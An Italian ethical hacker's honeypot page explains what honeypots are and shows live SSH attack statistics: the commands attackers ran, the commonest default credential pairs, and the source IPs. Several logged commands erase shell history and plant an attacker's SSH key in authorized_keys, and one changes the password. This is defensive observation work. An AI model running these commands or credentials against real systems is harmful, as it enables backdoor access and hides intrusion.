ENG ITA

# Ethical Hacker & ICT Security Specialist

Honeypot

In informatica, una honeypot (letteralmente: "barattolo di miele") è un sistema o componente hardware/software usato come esca al fine di studiare ed analizzare gli attacchi informatici in tempo reale.

Solitamente consiste in uno o più siti o servizi che sembrano essere parte della rete e che contengono informazioni preziose per un attaccante, ma che in realtà sono ben isolati e non contegono dati reali, ma forniscono a chi li amministra tutti i dettagli degli attacchi informatici subiti.

Il valore primario di una honeypot è quindi l'informazione che essa dà sulla natura e la frequenza di eventuali attacchi subiti.

Se sei curioso di scoprire questo mondo, guarda le statistiche degli attacchi in tempo reale che ora dopo ora vengono rilevati dalla mia rete di honeypot:

Dizionari live

E' possibile scaricare dizionari di password, nomi utente e coppie user/pass estrapolati dagli attacchi verso il servizio SSH:

Tutte le statistiche della honeypot di seguito:

SSH

×
Last 50 commands executed
DateCommandSource
2019-04-20 23:56:50uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd;mkdir .ssh;rm -rf .ssh/authorized_keys;touch .ssh/authorized_keys;echo 'ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAvN5GkpS25Z9eA2bARaXTVfVN2m/N5V5ddOTyVPftA3ljorQitmh1pyuZDty9oTWF+J0cOtGBvRaQ7NvZCaDC2q6QR0iMOfq7zs+4bl8WO8UnaQcVVIBeEt3YPo8PXwVm5fR4wgoq9SZp29/2jFz0UmAOhiUyImh9/P7jFWqpv3gSxZ8neq+4pSCUfE24OGiFBpJGkAE+wMmJcBX0WjFfjedcbBs1FO/C+x8WY9bFkQ3NwwjVbh3c3mYy9zqdPhm6GI/heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==' >> .ssh/authorized_keys;cd61.91.109.55 Thailand
2019-04-20 23:50:41uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd;mkdir .ssh;rm -rf .ssh/authorized_keys;touch .ssh/authorized_keys;echo 'ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAvN5GkpS25Z9eA2bARaXTVfVN2m/N5V5ddOTyVPftA3ljorQitmh1pyuZDty9oTWF+J0cOtGBvRaQ7NvZCaDC2q6QR0iMOfq7zs+4bl8WO8UnaQcVVIBeEt3YPo8PXwVm5fR4wgoq9SZp29/2jFz0UmAOhiUyImh9/P7jFWqpv3gSxZ8neq+4pSCUfE24OGiFBpJGkAE+wMmJcBX0WjFfjedcbBs1FO/C+x8WY9bFkQ3NwwjVbh3c3mYy9zqdPhm6GI/heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==' >> .ssh/authorized_keys;cd64.52.23.105 United States
2019-04-20 23:00:57lscpu | grep Model115.236.33.226 China
2019-04-20 23:00:51uname -a115.236.33.226 China
2019-04-20 23:00:46uname115.236.33.226 China
2019-04-20 23:00:40top115.236.33.226 China
2019-04-20 23:00:36cat /proc/cpuinfo | grep model | grep name | wc -l115.236.33.226 China
2019-04-20 23:00:30uname -m115.236.33.226 China
2019-04-20 23:00:25w115.236.33.226 China
2019-04-20 23:00:20crontab -l115.236.33.226 China
2019-04-20 23:00:15ls -lh $(which ls)115.236.33.226 China
2019-04-20 23:00:15which ls115.236.33.226 China
2019-04-20 23:00:11free -m | grep Mem | awk {print $2 ,$3, $4, $5, $6, $7}115.236.33.226 China
2019-04-20 23:00:10free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'115.236.33.226 China
2019-04-20 23:00:05cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'115.236.33.226 China
2019-04-20 23:00:05cat /proc/cpuinfo | grep name | head -n 1 | awk {print $4,$5,$6,$7,$8,$9;}115.236.33.226 China
2019-04-20 23:00:00echo -e "gay\\naQWBQkFoXQFN\\naQWBQkFoXQFN"|passwd|bash115.236.33.226 China
2019-04-20 23:00:00Enter new UNIX password: 115.236.33.226 China
2019-04-20 22:59:55cat /proc/cpuinfo | grep name | wc -l115.236.33.226 China
2019-04-20 22:49:38uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd;mkdir .ssh;rm -rf .ssh/authorized_keys;touch .ssh/authorized_keys;echo 'ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAvN5GkpS25Z9eA2bARaXTVfVN2m/N5V5ddOTyVPftA3ljorQitmh1pyuZDty9oTWF+J0cOtGBvRaQ7NvZCaDC2q6QR0iMOfq7zs+4bl8WO8UnaQcVVIBeEt3YPo8PXwVm5fR4wgoq9SZp29/2jFz0UmAOhiUyImh9/P7jFWqpv3gSxZ8neq+4pSCUfE24OGiFBpJGkAE+wMmJcBX0WjFfjedcbBs1FO/C+x8WY9bFkQ3NwwjVbh3c3mYy9zqdPhm6GI/heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==' >> .ssh/authorized_keys;cd106.12.90.123 China
2019-04-20 22:40:01lscpu | grep Model213.108.216.27 Russian Federation
2019-04-20 22:39:56uname -a213.108.216.27 Russian Federation
2019-04-20 22:39:49lscpu | grep Model92.81.222.217 Romania
2019-04-20 22:39:44uname213.108.216.27 Russian Federation
2019-04-20 22:39:40uname -a92.81.222.217 Romania
2019-04-20 22:39:34top213.108.216.27 Russian Federation
2019-04-20 22:39:29uname92.81.222.217 Romania
2019-04-20 22:39:22cat /proc/cpuinfo | grep model | grep name | wc -l213.108.216.27 Russian Federation
2019-04-20 22:39:18top92.81.222.217 Romania
2019-04-20 22:39:12uname -m213.108.216.27 Russian Federation
2019-04-20 22:39:07cat /proc/cpuinfo | grep model | grep name | wc -l92.81.222.217 Romania
2019-04-20 22:39:01w213.108.216.27 Russian Federation
2019-04-20 22:38:56uname -m92.81.222.217 Romania
2019-04-20 22:38:51lscpu | grep Model178.128.162.10 Greece
2019-04-20 22:38:46crontab -l213.108.216.27 Russian Federation
2019-04-20 22:38:41w92.81.222.217 Romania
2019-04-20 22:38:36uname -a178.128.162.10 Greece
2019-04-20 22:38:32crontab -l92.81.222.217 Romania
2019-04-20 22:38:27ls -lh $(which ls)213.108.216.27 Russian Federation
2019-04-20 22:38:27which ls213.108.216.27 Russian Federation
2019-04-20 22:38:23uname178.128.162.10 Greece
2019-04-20 22:38:17ls -lh $(which ls)92.81.222.217 Romania
2019-04-20 22:38:17which ls92.81.222.217 Romania
2019-04-20 22:38:13top178.128.162.10 Greece
2019-04-20 22:38:09free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'213.108.216.27 Russian Federation
2019-04-20 22:38:09free -m | grep Mem | awk {print $2 ,$3, $4, $5, $6, $7}213.108.216.27 Russian Federation
2019-04-20 22:38:02cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'213.108.216.27 Russian Federation
2019-04-20 22:38:02cat /proc/cpuinfo | grep name | head -n 1 | awk {print $4,$5,$6,$7,$8,$9;}213.108.216.27 Russian Federation
2019-04-20 22:37:57free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'92.81.222.217 Romania
2019-04-20 22:37:57free -m | grep Mem | awk {print $2 ,$3, $4, $5, $6, $7}92.81.222.217 Romania
×
Last 20 sessions
DateSource
2019-04-21 00:30:05185.220.221.223 Czech Republic
2019-04-21 00:30:055.188.86.198 Ireland
2019-04-21 00:30:0288.214.26.88
2019-04-21 00:29:575.188.86.194 Ireland
2019-04-21 00:29:55134.19.187.75 Netherlands
2019-04-21 00:29:505.188.87.54 Russian Federation
2019-04-21 00:29:3388.214.26.89
2019-04-21 00:29:33134.19.187.78 Netherlands
2019-04-21 00:29:235.188.86.209 Ireland
2019-04-21 00:29:215.188.87.51 Russian Federation
2019-04-21 00:29:135.188.86.167 Ireland
2019-04-21 00:29:135.188.86.164 Ireland
2019-04-21 00:29:1288.214.26.94
2019-04-21 00:29:1188.214.26.92
2019-04-21 00:29:1188.214.26.95
2019-04-21 00:29:1088.214.26.90
2019-04-21 00:29:095.188.86.211 Ireland
2019-04-21 00:29:075.188.86.174 Ireland
2019-04-21 00:29:025.188.86.211 Ireland
2019-04-21 00:29:0088.214.26.94
×
TOP 15 USER+PASS
CountUsernamePassword
437715 adminadmin123
13785 rootchangeme
4242 admin
1729 adminaerohive
1294 ubntubnt
760 adminadmin
511 supportsupport
419 rootadmin
394 useruser
374 serviceservice
357 root!@
340 piraspberry
330 usuariousuario
304 111111admin
302 adm12345678
×
TOP 20 SUCCESSFUL LOGIN IPs
CountSource
218215.188.86.174 Ireland
202115.188.86.211 Ireland
130335.188.87.49 Russian Federation
1302888.214.26.88
127195.188.87.54 Russian Federation
126965.188.87.55 Russian Federation
1261188.214.26.89
1245588.214.26.94
12340185.220.221.223 Czech Republic
122795.188.87.53 Russian Federation
11856185.220.221.203 Czech Republic
114705.188.86.170 Ireland
111575.188.87.51 Russian Federation
107545.188.86.208 Ireland
107295.188.86.194 Ireland
1071688.214.26.90
106485.188.87.52 Russian Federation
10622185.220.221.222 Czech Republic
105845.188.86.169 Ireland
105205.188.86.195 Ireland
×
TOP 20 attackers
ConnectionsSource
227035.188.86.174 Ireland
210645.188.86.211 Ireland
1358988.214.26.88
1321188.214.26.89
131685.188.87.49 Russian Federation
1309888.214.26.94
130725.188.87.54 Russian Federation
130515.188.87.55 Russian Federation
13037185.220.221.223 Czech Republic
127995.188.87.53 Russian Federation
12346185.220.221.203 Czech Republic
119045.188.86.170 Ireland
113455.188.87.51 Russian Federation
113105.188.87.52 Russian Federation
112895.188.86.208 Ireland
111815.188.86.169 Ireland
111625.188.86.197 Ireland
1113888.214.26.90
111155.188.86.195 Ireland
11113185.220.221.222 Czech Republic

Se vuoi guardare il codice che genera questa pagina, vai al sito del mio progetto HoneyStats! (github)

Vuoi ancora di più? Seguimi all'interno del laboratorio!